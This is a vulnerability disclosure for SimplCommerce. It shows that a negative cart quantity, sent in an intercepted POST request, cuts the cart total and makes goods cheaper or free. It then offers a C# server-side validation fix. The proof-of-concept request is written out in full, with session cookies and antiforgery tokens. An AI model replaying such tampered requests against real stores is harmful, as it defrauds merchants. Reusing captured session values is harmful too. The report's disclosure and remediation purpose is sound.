Business Logic Errors in simplcommerce/simplcommerce
Reported on
Oct 22nd 2021
Description
SimplCommerce accepts a negative quantity for a cart item. A negative line is subtracted from the cart total, so a user can reduce the price of other items to zero and get products for free.
The fix referenced in https://github.com/simplcommerce/SimplCommerce/issues/971 does not work because it relies on client-side controls, which can be bypassed by modifying the POST request in a proxy.
Proof of Concept
1: Add one $75 item and one $25 item to the cart.
2: Go to the cart, intercept the quantity-update request with a proxy, and change the quantity of the $25 item to a negative number:
POST /cart/update-item-quantity HTTP/1.1
Host: [SimplCommerce-URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg
Request-Id: |pRtb5.391Gl
Request-Context: appId=cid-v1:de097dc4-1502-4412-8c78-7841be1a73ca
Content-Length: 35
Connection: close
Referer: https://demo.simplcommerce.com/cart
Cookie: SimplUserGuid=91f7b2d4-15a5-4a08-9ce4-00da2c66305d; .AspNetCore.Antiforgery.w5W7x28NAIs=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsTHywY5Br5pCQ57dMzUuRg4fxgXa6fm-N1Gor6FSNlsWweJZXbjubBzprCzSp6SLR337WOpPkz95xI-dVjwjpeMlj0-W9ku50l4dj-xbQpYSBRFbdcS82dwHgJMu2vWI; ARRAffinity=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ARRAffinitySameSite=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ai_user=znO4m|2021-10-22T16:02:08.334Z; _ga=GA1.2.1639028580.1634918529; _gid=GA1.2.7867952.1634918529; ai_session=0lWcm|1634918528717|1634920904054; idsrv.session=ALatLXJs34-rHNZUd8goxw; .AspNetCore.Identity.Application=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsFlvej2SWbsdrnmONGDgt-z9lSvaXNUi-oynMXEMkEDbMRM5pISutqfBFaI6yDLLg3R0-WzdzWkRGO4edSHJmhFGlDVhZpb6VZDTNvxEHM2dLK2LjHJw5P0Rl6WgjToK2YJvAP8VCC69cu9HK_VhayGDxFgrq_5gMPtch7fQvOJRIm533JApctyh60HXs5V1nhoRH_1Yo9_H-ctQM7FAlv9TGVPQ6lxNVulwW8RONrqR5AgicpGp1W7R3mHfYfzmKc5bWLoJk9_1eKbhgVLuzrJZmjg4zHe1veAGnpiagldgpNRtj_7M4Wo0fD3EumNvMuUv9YcyFJr1g4rnxygVIwtN1zhYK2g8hTgPFuEY0SCgpK28LtMIcvDasGVik98XvzOqwd5OD5L8Y8gWCZM0zKI17oNnQGgtSPWODAjWaPhoQPU2pB-C7tNu-LHkyZ-i22_-ZQi2R5SEF-6dUaEGbn0tWrJom4Wu4TWqXEFIcvVODc_KT-tJO4ia1u3n3HozITs-JyXP6hKGGTPlU0gWxWwTeVeblnm_sx-hcEUUrcPwVv5R38AJDWG7yXGIRJv4n9bfcrF5wpFFRsUMLWUd5ERZOu4qOk3qPvT4fHXYqtRdu1fUn9a5c3GexBLWMWgXvPGOrNRGOJg8rrNt-RDWrQSpugXx1HRl-8_vvLvKb5-0mdbBa19eDTxqb8U9MXCBdmFh2t3tr0tXg7ME3JdXR614A1Z-gLtYkatmXwhGpDH3dQyyCKG4mem_cS1bqb23shyreH5wE-wbrF-ZJJmFp1bI-YHwJxY955fbRFF7EwEO-ia6tHNcq_-fVQQv97DyPhrQYN1uDYe4AXF5ss4TJPxbKgiiKoOFCnQJ8qObK0ivf5SemKy4sg60QPVdQq-g7SViZwn16CY0V5brn3Tclu4t03zlnNFHNwU61Qz2vzrY2nsgcwO3HXa9goJe4ChT7o0v4M_DOiagtSDsAp3KKPdY6zb1CAx-Vbm9TPLTrXYd49ZyiqXeo_2K2njmQvJ0z6X0DOwOTMuXQiOSi5WAG; XSRF-TOKEN=CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg
{"cartItemId":372127,"quantity":-2}
3: The cart total is now $25: the two negative $25 lines (-$50) are subtracted from the $75 product, so the $75 product effectively costs $25.
See the following screenshot of the $75 product now costing $25: https://drive.google.com/file/d/1HIb1xp43IYTv7k9j8_S-BNQZa6DiWvrL/view?usp=sharing
Impact
This vulnerability is capable of...
Occurrences
CartController.cs L97-L131
The quantity should be validated on the server and rejected if it is negative (or zero).
CartController.cs L46-L80
The quantity should be validated on the server and rejected if it is negative (or zero).
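One way to close this on the server, shown here as an added example and not as SimplCommerce's own code: validate the quantity in the request model, check ModelState explicitly, and have the cart item itself refuse a non-positive quantity so no other caller can reintroduce the bug. The route mirrors the PoC request above; the type and member names (UpdateCartItemRequest, ICartItemRepository, CartItem.SetQuantity, CartTotals) are assumed for illustration.

```csharp
// Added example for this report, not code from the SimplCommerce project.
// Route mirrors the PoC: POST /cart/update-item-quantity with
// {"cartItemId":...,"quantity":...}. Type and member names are assumed.
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;

namespace Example.Cart
{
    // Body of the POST. An omitted or non-numeric quantity binds to 0,
    // which [Range] rejects together with every negative value.
    public class UpdateCartItemRequest
    {
        [Required]
        public long CartItemId { get; set; }

        [Range(1, 1000, ErrorMessage = "Quantity must be between 1 and 1000.")]
        public int Quantity { get; set; }
    }

    public class CartItem
    {
        public long Id { get; set; }
        public decimal UnitPrice { get; set; }
        public int Quantity { get; private set; }
        public decimal LineTotal => UnitPrice * Quantity;

        // Second line of defence: the domain object refuses a bad quantity even
        // when a caller reaches it without going through model validation.
        public void SetQuantity(int quantity)
        {
            if (quantity < 1)
            {
                throw new ArgumentOutOfRangeException(nameof(quantity),
                    "Quantity must be at least 1; use the remove-item endpoint to delete a line.");
            }
            Quantity = quantity;
        }
    }

    public static class CartTotals
    {
        // Checkout-time guard for carts persisted before validation was added:
        // refuse to price a cart that still contains a non-positive line.
        public static decimal Total(IEnumerable<CartItem> items)
        {
            decimal total = 0m;
            foreach (var item in items)
            {
                if (item.Quantity < 1)
                {
                    throw new InvalidOperationException(
                        $"Cart item {item.Id} has invalid quantity {item.Quantity}.");
                }
                total += item.LineTotal;
            }
            return total;
        }
    }

    public interface ICartItemRepository
    {
        Task<CartItem> FindAsync(long id);
        Task SaveAsync(CartItem item);
    }

    [Route("cart")]
    public class CartController : Controller
    {
        private readonly ICartItemRepository _items;

        public CartController(ICartItemRepository items) => _items = items;

        [HttpPost("update-item-quantity")]
        [ValidateAntiForgeryToken]
        public async Task<IActionResult> UpdateItemQuantity([FromBody] UpdateCartItemRequest request)
        {
            // A plain Controller (not [ApiController]) does not reject invalid
            // models automatically, so the check must be explicit. The PoC body
            // {"cartItemId":372127,"quantity":-2} stops here with HTTP 400.
            if (request == null || !ModelState.IsValid)
            {
                return BadRequest(ModelState);
            }

            var item = await _items.FindAsync(request.CartItemId);
            if (item == null)
            {
                return NotFound();
            }

            item.SetQuantity(request.Quantity);
            await _items.SaveAsync(item);

            return Ok(new { item.Id, item.Quantity, item.LineTotal });
        }
    }
}
```

To verify a fix of this shape, replay the intercepted request from the proof of concept with quantity -2 and then with quantity 0: both should return 400 and leave the cart total unchanged, while a quantity of 2 should still succeed. Removing a line must go through a dedicated remove endpoint rather than a zero quantity, otherwise the validation has to carry an exception that is easy to get wrong.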